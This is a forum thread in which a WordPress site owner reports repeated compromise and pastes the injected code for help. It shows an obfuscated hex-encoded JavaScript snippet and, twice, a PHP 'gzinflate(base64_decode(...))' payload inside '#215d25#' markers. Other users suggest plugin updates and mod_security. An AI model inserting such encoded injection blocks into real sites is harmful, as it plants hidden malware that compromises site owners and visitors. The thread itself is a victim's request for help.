Please help me with spam issues

Status
Not open for further replies.

DevilLnC

Active Member
361
2010
13
0
Hi guys someone is spamming my website allskip.com

Code:
<script type="text/javascript" language="javascript"> var lprcb=new Date( ); lprcb.setTime(lprcb.getTime( )+12*60*60*1000); ****************="\x6e\x5f\x73\x65\x73s\x5f\x69d\x3d\x30\x64\x38\x657cba\x65\x64\x63\x39\x61\x34\x35\x371\x61\x62e\x37\x61\x37\x32\x35\x36\x64\x31e\x65\x617"+"\x3b\x20path=/;\x20expire\x73="+lprcb.toGMTString( ); </script>

and this i got in my Header file

Code:
#215d25#
echo(gzinflate(base64_decode("zVZLj5swEP4rLRdgUVgM2IBY99Jeeu4xyoFNoGG1SxLwNkqi8NvrsY1D3nRVqZUSQ8Yz883D38RPzbQul+zLjH7LWJ7OaJWvP80sO53T0TKrm/x7xSzTQ75pP+K0LKx1Wc0Wa3e2mL6/5RWzWb3ZcRtjtc4Nd1kv2IJtlvl+mrHp3FqtVvZuu6Vm9mqm8PxlOttt2jTUMMAZsncFNQvTMWv+Xbzx5es8q820oAV/BdmML7mZ7nPK5mUzLtzm/blhtYWQzV1NUkbNDd+uqBG4uIUvRrB4LcItStowaXHIBWEM0ggWUAoTeAu5pPV9rq1FURsIJ4H6faKMCaBwCxCFqA2FRzAPYvVDW3B0FAtoFUIizYQQCQcg9jkU7iQEXGGVyWlGmJxCcAmgwKsfn1gSsEKdYiBDl4FdwRlWq1jiyqCiQ6qk9ZMboSIsI4AdcOHrUmAkKss/kAXHgF1fbSD19PqoWn5YRGgCkWhzgR1pnVDoSPOuC1jlg1T6kXClQ/MD2SCtjFQ1UNd2GfwNCyLLhJPeqerlHitfREfRSQJdYiz7q/MOE/lRSQk/WLbu4Eek4nZiUJO1AP9EywNVNNVH6as7+55ILYZ05EakrHBfKvIIPOi+6tq1I8CVELl1WvsCgS5DD+ML+aCBvLjMqI6sRPgRw8JPOr4MYEGoWCCkYb+EN8dHNxJu0EQPB1kiTxxa0p9PXXcjTQjoaXRCx9g9IZw8nujfc+5ScmcM8f+EGkej5JwhMvMBiPdJpJHuc2kw6jHdepNkuIseMe/af+Qcnc/Io9N0PPT+1uG9MmsHIX/on+1/uAXAbInUQD9gcqPgiJ0QGLiG0XV1nhpus3wtmWVkraHvTbadFovaKqmXlp8pJklaOo69e6El3MuaxvnB6rL6OS4m1mj+YPkj5KCHavwy4YZ7cWdbcS24vW23dm4ZhrOy06dHdY/8DQ==")));
#/215d25#

i'm getting this TYpe of Script Code in my Page.php

it happened 2 times, and i got Notice from google too.. but i Reset the site from backup. But today also i got this type of script in my page.php someone plz help me how to Secure my wordpress site ???
 
Last edited:
10 comments
The best thing you can do is look up each and every mod/plugin you are using in google and its version number to see if their is a exploit available and if the patch has been released.

Also always make sure your wordpress is up2date.

A better solution if you have a vps or dedicated server is to setup mod_security and block such attacks the best you can since mod_security checks anything before being sent.
 
I read up a bit and its most likely an old timthumb exploit.

Make sure you update any plugin using timthumb, and update your whole cms.



<edit>
You dont seem to be using any of the wordpress install, i would just change your site to use php and html files.
 
Last edited:
my theme doesnot use timthumb :|

---------- Post added 25th Mar 2012 at 06:33 PM ---------- Previous post was 24th Mar 2012 at 09:04 PM ----------

No one Knows about this Problem ???
 
I dont have CLicksor - im using adsense..

---------- Post added at 06:39 PM ---------- Previous post was at 06:38 PM ----------

Im Getting this script code in my all Files again n again..

Code:
#215d25#
echo(gzinflate(base64_decode("zVZLj5swEP4rLRdgUVgM2IBY99Jeeu4xyoFNoGG1SxLwNkqi8NvrsY1D3nRVqZUSQ8Yz883D38RPzbQul+zLjH7LWJ7OaJWvP80sO53T0TKrm/x7xSzTQ75pP+K0LKx1Wc0Wa3e2mL6/5RWzWb3ZcRtjtc4Nd1kv2IJtlvl+mrHp3FqtVvZuu6Vm9mqm8PxlOttt2jTUMMAZsncFNQvTMWv+Xbzx5es8q820oAV/BdmML7mZ7nPK5mUzLtzm/blhtYWQzV1NUkbNDd+uqBG4uIUvRrB4LcItStowaXHIBWEM0ggWUAoTeAu5pPV9rq1FURsIJ4H6faKMCaBwCxCFqA2FRzAPYvVDW3B0FAtoFUIizYQQCQcg9jkU7iQEXGGVyWlGmJxCcAmgwKsfn1gSsEKdYiBDl4FdwRlWq1jiyqCiQ6qk9ZMboSIsI4AdcOHrUmAkKss/kAXHgF1fbSD19PqoWn5YRGgCkWhzgR1pnVDoSPOuC1jlg1T6kXClQ/MD2SCtjFQ1UNd2GfwNCyLLhJPeqerlHitfREfRSQJdYiz7q/MOE/lRSQk/WLbu4Eek4nZiUJO1AP9EywNVNNVH6as7+55ILYZ05EakrHBfKvIIPOi+6tq1I8CVELl1WvsCgS5DD+ML+aCBvLjMqI6sRPgRw8JPOr4MYEGoWCCkYb+EN8dHNxJu0EQPB1kiTxxa0p9PXXcjTQjoaXRCx9g9IZw8nujfc+5ScmcM8f+EGkej5JwhMvMBiPdJpJHuc2kw6jHdepNkuIseMe/af+Qcnc/Io9N0PPT+1uG9MmsHIX/on+1/uAXAbInUQD9gcqPgiJ0QGLiG0XV1nhpus3wtmWVkraHvTbadFovaKqmXlp8pJklaOo69e6El3MuaxvnB6rL6OS4m1mj+YPkj5KCHavwy4YZ7cWdbcS24vW23dm4ZhrOy06dHdY/8DQ==")));
#/215d25#
 
@ Desi_Boy - Tomorrow i'm Reinstall my OS and Cpanel.. then will see who the hell will hack it.. this made me so Crazy i'm facing this problem from 3 days i Reset my website 3 Times X_X it's pissing me off real bad..
 
Status
Not open for further replies.
Back
Top